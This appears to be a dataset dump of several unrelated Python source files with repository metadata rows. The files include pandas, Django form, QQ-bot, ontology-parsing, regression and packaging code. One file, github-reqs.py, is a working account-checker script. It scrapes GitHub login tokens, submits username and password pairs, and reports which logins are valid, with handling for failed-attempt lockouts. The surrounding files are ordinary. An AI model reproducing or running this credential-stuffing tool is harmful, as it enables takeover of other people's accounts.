        if pandas_filter is not None:
            data = self.get_data()[pandas_filter]
            return self.stream(data)
        else:
            return self
def sort(self, *keys, reverse: bool = False) -> Native:
dataframe = self.get_dataframe().sort_values(
by=keys,
ascending=not reverse,
)
return self.stream(dataframe)
def group_by(self, *keys, as_pairs: bool = False) -> Native:
grouped = self.get_dataframe().groupby(
by=keys,
as_index=as_pairs,
)
return self.stream(grouped)
def is_empty(self) -> bool:
return self.get_count() == 0
def collect(self) -> Native:
return self
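# Usage sketch (hypothetical data; assumes the surrounding stream framework
# is configured so that PandasStream can be constructed directly):
# stream = PandasStream([{'a': 1, 'b': 2}, {'a': 1, 'b': 3}])
# stream.filter(a=1).sort('b', reverse=True).get_dataframe()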
| 37.279762 | 117 | 0.637235 | 741 | 6,263 | 5.19973 | 0.202429 | 0.051908 | 0.041526 | 0.049312 | 0.253569 | 0.194654 | 0.1687 | 0.1687 | 0.14586 | 0.14586 | 0 | 0.00131 | 0.268721 | 6,263 | 167 | 118 | 37.502994 | 0.839956 | 0.029858 | 0 | 0.164286 | 0 | 0 | 0.056004 | 0.004612 | 0 | 0 | 0 | 0 | 0.042857 | 1 | 0.171429 | false | 0 | 0.078571 | 0.057143 | 0.457143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d75329430bdda15fd5e6ec9cd27c0a98a28ad4 | 2,088 | py | Python | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | 2 | 2022-03-05T18:49:19.000Z | 2022-03-07T13:23:57.000Z | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | null | null | null | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | null | null | null | import requests
import win32api,win32con
import json,os,sys
configs={
'url':"http://127.0.0.1:10429",
'textcont': 0
}
# Get the desktop path
def get_desktop():
key =win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0,win32con.KEY_READ)
return win32api.RegQueryValueEx(key,'Desktop')[0]
# Send a private chat message
def privatemsg(login,toqq,text):
url = configs.get('url')+ '/sendprivatemsg'
    print('====> Private message triggered')
data = {
'logonqq':login,
'toqq':toqq,
'msg':text
}
requests.post(url,data=data)
# Get the framework's logged-in QQ account info
def getlogonqq():
url = configs.get('url')+'/getlogonqq'
return requests.post(url).text
# Upload a zk content image
def uploadzkpic(loginqq,group,path):
url = configs.get('url')+'/uploadgrouppic'
data={
'logonqq': loginqq,
'group': group,
'type':"path",
'pic':os.path.dirname(os.path.realpath(sys.argv[0]))+'\\'+path+'.png'
}
resp = requests.post(url, data=data).text
resp = json.loads(resp)['ret']
return resp
# Upload a group image
def uploadgrouppic(loginqq,group,path,type='path'):
url = configs.get('url')+'/uploadgrouppic'
data={
'logonqq': loginqq,
'group': group,
'type':type,
'pic':path
}
resp = requests.post(url, data=data).text
resp = json.loads(resp)['ret']
return resp
# Send a group chat message
def groupmsg(logonqq,group,msg,type=''):
url = configs.get('url') + '/sendgroupmsg'
    print('====> Group message triggered')
data = {
'type':type,
'logonqq': logonqq,
'group':group,
'msg':msg,
'anonymous':'false'
}
requests.post(url, data=data)
# Add a group
def addgroup(logonqq,group):
url = configs.get('url')+'/addgroup'
data = {
'logonqq': logonqq,
'group': group,
        'msg': 'Hello, I am Odis'
}
return requests.post(url,data=data)
#取群列表
def getgrouplist(logonqq):
url = configs.get('url')+'/getgrouplist'
data = {
'logonqq':logonqq
}
resp = requests.post(url,data=data).text
resp = json.loads(resp)['list']['List']
return resp
| 25.156627 | 144 | 0.606322 | 246 | 2,088 | 5.130081 | 0.313008 | 0.055468 | 0.072108 | 0.088748 | 0.336767 | 0.239303 | 0.239303 | 0.239303 | 0.239303 | 0.239303 | 0 | 0.016504 | 0.216475 | 2,088 | 82 | 145 | 25.463415 | 0.75489 | 0.022989 | 0 | 0.394366 | 0 | 0 | 0.186516 | 0.027559 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112676 | false | 0 | 0.042254 | 0 | 0.239437 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5da98c798e1102a47991773a56205130565910e | 17,288 | py | Python | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | null | null | null | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | 44 | 2022-01-21T01:33:59.000Z | 2022-03-26T23:35:25.000Z | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | null | null | null | from datetime import time
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.forms import Form, ModelForm, CheckboxInput, NumberInput, Textarea
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Column, Div, Field, HTML, Layout, Row, Submit
from crispy_forms.bootstrap import AppendedText, FormActions
from .models.song import Song, SongFileInput, SpotifyTrackInput, DANCE_TYPE_CHOICES, HOLIDAY_CHOICES, HOLIDAY_USE_OPTIONS, HOLIDAY_DEFAULT_USAGE #StreamingSongInput,
from .models.user import User
from .models.playlist import Playlist
class SongFileInputForm(ModelForm):
'''form for uploading new music from a file.'''
class Meta:
model = SongFileInput
# allow user to specify file, dance_type, and select holiday if any
fields = ['audio_file', 'dance_type', 'holiday']
class SpotifyTrackInputForm(ModelForm):
'''form for uploading new music from a file.'''
class Meta:
model = SpotifyTrackInput
# allow user to specify file, dance_type, and select holiday if any
fields = ['track_id', 'title', 'artist', 'dance_type', 'holiday']
class SpotifySearchForm(Form):
search_term = forms.CharField(
label='Keywords',
max_length=100,
required = True)
content_type = forms.ChoiceField(
choices = [("album", "Album"),
("artist", "Artist"),
("playlist", "Playlist"),
("track", "Track")],
widget = forms.RadioSelect,
required = True)
class SongEditForm(ModelForm):
'''form to edit info for an existing song.'''
title = forms.CharField(
label = "Title",
max_length = 80, # ensure the field is wide enough to show the title
required = True,
)
artist = forms.CharField(
label = "Artist",
max_length = 80, # ensure the field is wide enough to show the artist
required = True,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-songEditForm'
self.helper.form_method = 'post'
# this is needed to return files from the form
self.helper.attrs = {'enctype': 'multipart/form-data'}
self.helper.label_class='fw-bold mt-2' # allow some top margin for the form
self.helper.layout = Layout(
# show the fields in this order
'title',
'artist',
'image',
'dance_type',
'holiday',
FormActions(
# submit button and cancel link in the form of a button
Submit('save', 'Save changes'),
HTML("""<a href="{% url 'App:all_songs' %}" class="btn btn-secondary">Cancel</a>"""),
# add some y-margin around the buttons.
css_class="my-3"
)
)
class Meta:
# obtain data from these fields of the song model
model = Song
fields = ['title', 'artist', 'image', 'dance_type', 'holiday']
class PlaylistInfoForm(ModelForm):
''' form to enter information for a playlist '''
title = forms.CharField(
label = "",
max_length = 50, # ensure the field is wide enough to show the title
required = True)
description = forms.CharField(
label = "Description",
required = False,
# limit height of this field to 3 rows
widget = Textarea(attrs={'rows': 3}))
is_showcase_or_comp = forms.BooleanField(
label = "Competition/Showcase",
required = False) # this field must not be required in order to set it to false
auto_continue = forms.BooleanField(
label = "Autoplay Next Song",
required = False) # this field must not be required in order to set it to false
max_song_duration = forms.ChoiceField(
label = "Song Time Limit",
required = False,
# use a dropdown field for the song time limit
choices = (
(time(minute=30), "------"),
(time(minute=1, second=15), "1:15"),
(time(minute=1, second=30), "1:30"),
(time(minute=1, second=45), "1:45"),
(time(minute=2, second= 0), "2:00"),
(time(minute=2, second=15), "2:15"),
(time(minute=2, second=30), "2:30"),
(time(minute=2, second=45), "2:45"),
(time(minute=3, second= 0), "3:00")
)
)
def __init__(self, *args, **kwargs):
# this form is used for playlist creation and editing.
# submit_title argument tells us which it is.
self.submit_title = kwargs.pop('submit_title')
super(PlaylistInfoForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-PlaylistEditForm'
self.helper.form_method = 'post'
# Form labels will be bold text
self.helper.label_class = 'fw-bold'
if self.submit_title is not None:
self.helper.layout = Layout(
# first row has two columns: title and checkboxes
Row(
Column(
Field('title', css_class='fs-3 px-0 text-center'),
css_class="col-8 offset-2"),
Column('is_showcase_or_comp', 'auto_continue',
css_class="col-2 text-start"),
),
# next row has two columns: description field in the right column is 3 rows tall
Row(
Column('max_song_duration', css_class="col-2 offset-2"),
Column('description',css_class='text-start col-8 lh-sm'),
),
# submit and cancel buttons are included, button text comes from submit_title
FormActions(
Submit('submit', self.submit_title),
HTML("""<a href="{% url 'App:all_playlists' %}" class="btn btn-secondary">Cancel</a>"""),
css_class="my-2"
)
)
else: # same layout as above without submit/cancel buttons as javascript is used to submit the form
self.helper.layout = Layout(
Row(
Column(
Field('title', css_class='fs-3 px-0 text-center'),
css_class="col-8 offset-2"),
Column('is_showcase_or_comp', 'auto_continue',
css_class="col-2 text-start"),
),
Row(
Column('max_song_duration', css_class="col-2 offset-2"),
Column('description',css_class='text-start col-8 lh-sm'),
),
)
class Meta:
model = Playlist
# include these fields in the form
fields = ['title', 'description', 'is_showcase_or_comp', 'auto_continue', 'max_song_duration']
class RandomPlaylistForm(Form):
'''form to specify parameters when populating a random playlist.'''
save_preferences = forms.BooleanField(
label = "Save these settings as the default for your future playlists?",
initial = False,
required = False)
def __init__(self, *args, **kwargs):
# get the preferences in this dictionary argument
self.prefs = kwargs.pop('prefs')
super(RandomPlaylistForm, self).__init__(*args, **kwargs)
self.fields['number_of_songs'] = forms.IntegerField(
label = "Number of Songs",
min_value = 1,
max_value = 100,
initial = self.prefs['playlist_length'],
# center the text in this input box
widget = NumberInput(attrs={'class': 'text-center'}),
required = True)
self.fields['prevent_back_to_back_styles'] = forms.BooleanField(
# add information icon to the end of the label
label = "Prevent Same Style Back-to-Back \u24d8" ,
initial = self.prefs['prevent_back_to_back_styles'],
required = False)
self.fields['prevent_back_to_back_tempos'] = forms.BooleanField(
# add information icon to the end of the label
label = "Prevent Same Tempo Back-to-Back \u24d8" ,
initial = self.prefs['prevent_back_to_back_tempos'],
required = False)
field_names = list()
# these fields allow the user to enter percentages for each dance style
# add them to the form using a loop
for dance_type_tuple in DANCE_TYPE_CHOICES:
# constuct field name based on dance type abbreviation (e.g. 'Cha')
field_name = '%s_pct' % (dance_type_tuple[0], )
self.fields[field_name] = forms.IntegerField(
# field label is the readable name for this dance type
label = dance_type_tuple[1],
min_value = 0,
max_value = 100,
initial = self.prefs['percentages'][dance_type_tuple[0]],
# right-justify the text in these input boxes
widget = NumberInput(attrs={'class': 'text-end'}),
required = True)
# build a list of field names for use in column layout
field_names.append(field_name)
# these fields allow the user to enter preferences for each holiday
# add them to the form using a loop
for holiday_tuple in HOLIDAY_CHOICES:
field_name = "%s_use" % (holiday_tuple[0], )
self.fields[field_name] = forms.ChoiceField(
label = holiday_tuple[1],
choices = HOLIDAY_USE_OPTIONS,
initial = self.prefs['holiday_usage'][holiday_tuple[0]],
required = True
)
field_names.append(field_name)
# see django-crispy-forms example
self.helper = FormHelper()
self.helper.form_id = 'id-random-playlist-Form'
self.helper.form_method = 'post'
self.helper.layout = Layout(
# first row has two columns
Row(
# style the label with font weight bold and font size 5
Column('number_of_songs', css_class="fw-bold fs-5 col-2 offset-4"),
Column(
# add tooltips to these fields. Using Div applies tooltip to combination of label and checkbox
Div('prevent_back_to_back_styles',
data_bs_toggle="tooltip",
data_bs_placement="right",
title="Checking this box prevents the playlist from having two consecutive songs of the same dance style.",
),
Div('prevent_back_to_back_tempos',
data_bs_toggle="tooltip",
data_bs_placement="right",
title="Checking this box prevents the playlist from having two consecutive fast songs or two consecutive slow songs.",
),
# left-justify the second column, keep it toward the middle of the form
css_class='text-start px-4 col-6'),
# align the bottom of the two columns in this row
css_class='align-items-end'
),
# second row has two column titles, one for percentages, the other for holidays
Row(
Column(
HTML("<h4 class='text-center'>Select Percentages for each dance style</h4>"),
HTML("<h6 class='text-center'>Values must add up to 100 percent</h6>"),
# percentage data should take 9/12 of the window
css_class='col-9 text-center',
),
Column(
HTML("<h5 class='text-center'>Include Holiday-Themed Songs?</h5>"),
# holidays only need 3/12 of the windoe
css_class='col-3 text-center',
),
# align the bottom of the two columns in this row
css_class='align-items-end'
),
# next row has two columns, one for percentage data, the other for holiday selections
Row(
Column(
# first column is split into five sub-columns to set percentages for each dance type
Row(
Column(AppendedText(field_names[0], '%', active=True),
AppendedText(field_names[1], '%', active=True),
AppendedText(field_names[2], '%', active=True),
AppendedText(field_names[3], '%', active=True),
# each sub-column takes 2/12 of the enclosing column, first sub-column is offset 1/12
css_class="col-2 offset-1"),
Column(AppendedText(field_names[4], '%', active=True),
AppendedText(field_names[5], '%', active=True),
AppendedText(field_names[6], '%', active=True),
AppendedText(field_names[7], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[8], '%', active=True),
AppendedText(field_names[9], '%', active=True),
AppendedText(field_names[10], '%', active=True),
AppendedText(field_names[11], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[12], '%', active=True),
AppendedText(field_names[13], '%', active=True),
AppendedText(field_names[14], '%', active=True),
AppendedText(field_names[15], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[16], '%', active=True),
AppendedText(field_names[17], '%', active=True),
AppendedText(field_names[18], '%', active=True),
AppendedText(field_names[19], '%', active=True), css_class="col-2"),
# put a dark border around the five subcolumns
css_class='pt-2 border border-dark',
# establish an ID for javascript to use
css_id='enter-percentages'
),
# this row for an error message is centered under the five subcolumns
Row(
# establish an ID so Javascript can modify this error text
HTML("<p hidden id='percentage-error'>Current total is <span id='percentage-total'></span> percent</p>"),
),
css_class='text-center'
),
Column(
# second column determines if holiday songs will be used
Row(
field_names[20], field_names[21], field_names[22], field_names[23],
# put a border around these elements
css_class='pt-2 border border-danger',
# establish an ID for javascript to use
css_id='enter-holidays'
),
# this column takes 3/12 of the window and data is centered within that allocaation
css_class='col-3 text-center'
),
),
# this row has a save checkbox, it is centered in the entire window and has a top margin
Row(
Column('save_preferences'),
css_class = 'col-12 text-center mt-3'
),
# submit and cancel buttons
FormActions(
Submit('continue', 'Continue'),
Submit('cancel', 'Cancel'),
# provide a small margin in the y-direction, top and bottom
css_class="my-1"
)
)
# based on example at: https://github.com/sibtc/django-multiple-user-types-example
class TeacherSignUpForm(UserCreationForm):
'''
Create a signup form for teachers based on Django's User Creation Form.
'''
class Meta(UserCreationForm.Meta):
model = User # specify the model
def save(self, commit=True):
user = super().save(commit=False) # get the object saved by the Django form
user.is_teacher = True # set is_teacher flag
if commit: # save user object if everything ok
user.save()
return user | 45.375328 | 166 | 0.53193 | 1,884 | 17,288 | 4.765924 | 0.203822 | 0.025838 | 0.049003 | 0.045105 | 0.400936 | 0.291681 | 0.234659 | 0.221294 | 0.217062 | 0.201025 | 0 | 0.016788 | 0.372918 | 17,288 | 381 | 167 | 45.375328 | 0.811457 | 0.213616 | 0 | 0.350554 | 0 | 0.01107 | 0.167828 | 0.027576 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01476 | false | 0 | 0.0369 | 0 | 0.136531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5db6e8ce1d354081b1aa2dec66d342e859e99b3 | 2,839 | py | Python | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
NAME: github-reqs.py
AUTHOR: Ulyouth
VERSION: 1.0.0
DATE: 15.10.2020
DESC: A PyBullet-based script to check which GitHub logins are valid
using requests library.
"""
from chkutils import ChkUtils
def chkMain(ss, test, rst, captcha, data):
    # Good practice, since 'data' can be either a list or a string,
    # depending on the number of elements in each line
if isinstance(data, list):
user = data[0]
pswd = data[1]
else:
# -200 = Exception = Terminate program!
return [-200, 'Invalid list format']
# Class containing a list of useful functions.
chk = ChkUtils()
# Login GET link.
lnk = 'https://github.com/login'
# Retrieve the login page.
r = chk.getnlog(ss, lnk, 'login.htm', 'github', user)
# Obtain the necessary login tokens.
auth_tok = chk.grab(r.text, 'authenticity_token" value="', '"')
tstamp = chk.grab(r.text, 'timestamp" value="', '"')
tsecret = chk.grab(r.text, 'timestamp_secret" value="', '"')
# Check if any tokens are missing.
if len(auth_tok) == 0 or len(tstamp) == 0 or len(tsecret) == 0:
# -1 = Error = Retry!
return [-1, 'Missing token']
elif test == 1:
# Print the tokens if running in test mode.
print('> authenticity_token: ' + auth_tok)
print('> timestamp: ' + tstamp)
print('> timestamp_secret: ' + tsecret)
# Login POST link
lnk = 'https://github.com/session'
# Login POST data dict
data = {'commit': 'Sign in',
'authenticity_token': auth_tok,
            # Not sure what the 'ga_id' is for, but it works using always
            # the same value.
'ga_id': '1348735984.1584973938',
'login': user,
'password': pswd,
'webauthn-support': 'supported',
'webauthn-iuvpaa-support': 'unsupported',
'return_to': '',
'allow_signup': '',
'client_id': '',
'integration': '',
'required_field_d202': '',
'timestamp': tstamp,
'timestamp_secret': tsecret }
# Attempt to login.
r = chk.postnlog(ss, lnk, 'login.htm', 'github', user, data = data)
# Evaluate the login attempt.
if r.text.find('Signed in as') != -1:
return [100, user] # 100 = Valid password (display in green)
elif r.text.find('Incorrect username or password.') != -1:
return [200, user] # 200 = Invalid password (display in red)
elif r.text.find('There have been several failed attempts') != -1:
return [-2, user] # -2 = Error = Retry!
else:
return [0, user] # 0 = Unknown = Skip (display in yellow)
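# Usage sketch (hypothetical credentials; a requests.Session is assumed):
# import requests
# ss = requests.Session()
# code, info = chkMain(ss, test=1, rst=None, captcha=None,
#                      data=['user@example.com', 'hunter2'])
# `code` follows the conventions above: 100 valid, 200 invalid, negative = retry/abort.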
| 35.049383 | 76 | 0.552659 | 337 | 2,839 | 4.605341 | 0.48368 | 0.01933 | 0.015464 | 0.023196 | 0.083763 | 0.029639 | 0 | 0 | 0 | 0 | 0 | 0.03507 | 0.317013 | 2,839 | 80 | 77 | 35.4875 | 0.765343 | 0.307503 | 0 | 0.046512 | 0 | 0 | 0.288482 | 0.023681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.046512 | 0.023256 | 0 | 0.186047 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5dd6cd1130e1740cdf8aab7d98bb4815a29fc80 | 1,649 | py | Python | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | null | null | null | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | null | null | null | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | 2 | 2021-07-12T00:48:08.000Z | 2021-08-11T12:53:05.000Z | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
import pandas as pd
housing_data = pd.read_csv("../input/kc_house_data.csv")
features = [u'bedrooms', u'bathrooms', u'sqft_living',
u'floors', u'condition', u'grade', u'sqft_lot15',
u'sqft_lot',
u'sqft_above', u'sqft_living15', u'sqft_basement']
price = housing_data['price']
housing_data = pd.DataFrame(housing_data, columns=features)
housing_data.head()
# In[ ]:
from sklearn.model_selection import train_test_split  # sklearn.cross_validation was removed in scikit-learn 0.20
X_train, X_test, y_train, y_test = train_test_split(housing_data, price, random_state=0)
# In[ ]:
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
sc.fit(X_train)
X_train_std = sc.transform(X_train)
X_test_std = sc.transform(X_test)
# In[ ]:
from pandas import read_csv, DataFrame
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
models = [LinearRegression(),
RandomForestRegressor(n_estimators=100, max_features ='sqrt'),
KNeighborsRegressor(n_neighbors=6),
SVR(kernel='linear'),
]
train_results = []
for model in models:
model.fit(X_train_std, y_train)
y_train_pred = model.predict(X_train_std)
y_test_pred = model.predict(X_test_std)
train_results.append([model, y_train_pred, y_test_pred])
accuracy = model.score(X_test_std, y_test)
print("Accuracy: {}%".format(int(round(accuracy * 100))))
# We can see that RandomForestRegressor coped best with this task, scoring about 69-70 percent (R^2).
| 24.984848 | 93 | 0.724682 | 233 | 1,649 | 4.88412 | 0.416309 | 0.057996 | 0.018453 | 0.019332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012292 | 0.16131 | 1,649 | 65 | 94 | 25.369231 | 0.810557 | 0.09339 | 0 | 0 | 0 | 0 | 0.104839 | 0.017473 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.235294 | 0 | 0.235294 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5dd8fab99ed6bdc735238b1925cb9d8d989746e | 4,580 | py | Python | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | import owlready2 as owl
from .. import gel, pgel
from . import pbox_parser
def parse(file: str):
onto = owl.get_ontology(file)
onto.load()
kb = get_kb(onto)
pbox_restrictions = pbox_parser.get_restrictions(onto)
return kb, pbox_restrictions
def get_kb(onto):
owl_concepts = list(onto.classes())
owl_individuals = list(onto.individuals())
owl_roles = onto.object_properties()
kb = pgel.ProbabilisticKnowledgeBase(owl.Nothing.iri, owl.Thing.iri)
add_concepts(kb, owl_concepts, gel.Concept)
add_concepts(kb, owl_individuals, gel.IndividualConcept)
add_roles(kb, owl_roles)
add_role_inclusions_from_roles(kb, owl_roles)
owl_basic_concepts = [owl.Thing] + owl_concepts + owl_individuals
add_axioms_from_concepts(kb, owl_basic_concepts)
return kb
def add_concepts(kb, owl_concepts, concept_class: type):
for owl_concept in owl_concepts:
kb.add_concept(concept_class(owl_concept.iri))
def add_roles(kb, owl_roles):
for owl_role in owl_roles:
kb.add_role(gel.Role(owl_role.iri))
def add_role_inclusions_from_roles(kb, owl_roles):
for owl_sup_role in owl_roles:
for owl_sub_role in owl_sup_role.get_property_chain():
add_chained_role_inclusion(kb, owl_sub_role, owl_sup_role)
for owl_sub_role in owl_sup_role.subclasses():
add_role_inclusion(kb, owl_sub_role, owl_sup_role)
def add_chained_role_inclusion(kb, owl_sub_role_chain, owl_sup_role):
owl_sub_role1, owl_sub_role2 = owl_sub_role_chain.properties
kb.add_chained_role_inclusion(
(owl_sub_role1.iri, owl_sub_role2.iri),
owl_sup_role.iri)
def add_role_inclusion(kb, owl_sub_role, owl_sup_role):
kb.add_role_inclusion(owl_sub_role.iri, owl_sup_role.iri)
def add_axioms_from_concepts(kb, owl_concepts):
for sub_concept in owl_concepts:
if sub_concept == owl.Nothing:
continue
for sup_concept in sub_concept.is_a:
# ignore trivial axioms
if sup_concept == owl.Thing:
continue
add_axiom(kb, sub_concept, sup_concept)
for sup_concept in sub_concept.equivalent_to:
add_axiom(kb, sub_concept, sup_concept)
add_axiom(kb, sup_concept, sub_concept)
if not is_concept(sub_concept):
for sup_concept, role in get_individual_sup_and_role(sub_concept):
pbox_id = pbox_parser.get_id(sub_concept, sup_concept)
kb.add_axiom(
sub_concept.iri,
sup_concept.iri,
role.iri,
pbox_id)
def add_axiom(kb, owl_sub_concept, owl_sup_concept):
sub_concept_iri = get_sub_concept_iri(kb, owl_sub_concept)
sup_concept_iri = get_sup_concept_iri(owl_sup_concept)
role_iri = get_role_iri(kb, owl_sup_concept)
pbox_id = pbox_parser.get_id(owl_sub_concept, owl_sup_concept)
kb.add_axiom(sub_concept_iri, sup_concept_iri, role_iri, pbox_id)
def get_sub_concept_iri(kb, owl_sub_concept):
sub_concept = owl_sub_concept
if is_existential(owl_sub_concept):
sub_concept = create_existential_concept(owl_sub_concept)
if sub_concept not in kb.concepts:
kb.add_concept(sub_concept)
return sub_concept.iri
def get_role_iri(kb, owl_sup_concept):
return extract_role_iri(owl_sup_concept) if is_existential(
owl_sup_concept) else kb.is_a.iri
def get_sup_concept_iri(owl_sup_concept):
return extract_concept_iri(owl_sup_concept) if is_existential(
owl_sup_concept) else owl_sup_concept.iri
def create_existential_concept(owl_concept):
role_iri = extract_role_iri(owl_concept)
concept_iri = extract_concept_iri(owl_concept)
existential_concept = gel.ExistentialConcept(role_iri, concept_iri)
return existential_concept
def is_existential(owl_concept):
return isinstance(owl_concept, owl.class_construct.Restriction)
def is_concept(owl_concept):
return isinstance(owl_concept, owl.entity.ThingClass)
def extract_role_iri(owl_existential_concept):
return type(owl_existential_concept.property()).iri
def extract_concept_iri(owl_existential_concept):
return type(owl_existential_concept.value()).iri
def get_individual_sup_and_role(owl_individual_concept):
for role in owl_individual_concept.get_properties():
sup_concepts = owl_individual_concept.__getattr__(role.name)
for sup_concept in sup_concepts:
yield sup_concept, role
if __name__ == '__main__':
parse('../data/example.owl')
| 31.156463 | 78 | 0.729694 | 670 | 4,580 | 4.543284 | 0.120896 | 0.088699 | 0.046978 | 0.019711 | 0.464849 | 0.385677 | 0.330486 | 0.220105 | 0.144875 | 0.09724 | 0 | 0.001358 | 0.19607 | 4,580 | 146 | 79 | 31.369863 | 0.825367 | 0.004585 | 0 | 0.040816 | 0 | 0 | 0.005925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.183673 | false | 0 | 0.030612 | 0.061224 | 0.316327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ddc99605250642acabc6c67ce2c33587aadd67 | 1,199 | py | Python | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 35 | 2019-08-05T12:46:28.000Z | 2022-01-25T10:37:32.000Z | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 14 | 2020-01-25T19:04:03.000Z | 2022-02-03T18:09:40.000Z | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 9 | 2019-08-12T21:15:47.000Z | 2021-03-11T03:15:43.000Z | from setuptools import Extension, setup
try:
import numpy.distutils.misc_util
except ModuleNotFoundError:
from setuptools import dist
dist.Distribution().fetch_build_eggs(["numpy"])
import numpy.distutils.misc_util
with open("README.md", "r") as f:
long_description = f.read()
setup(
name="robustats",
version="0.1.7",
description="Robustats is a Python library for high-performance computation" " of robust statistical estimators.",
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
],
url="https://github.com/FilippoBovo/robustats",
download_url="https://github.com/FilippoBovo/robustats/archive/" "v0.1.5.tar.gz",
author="Filippo Bovo",
author_email="bovo.filippo@gmail.com",
license="MIT",
packages=["robustats"],
install_requires=["numpy"],
ext_modules=[
Extension(
name="_robustats",
sources=["c/_robustats.c", "c/robustats.c", "c/base.c"],
extra_compile_args=["-std=c99"],
include_dirs=numpy.distutils.misc_util.get_numpy_include_dirs(),
)
],
)
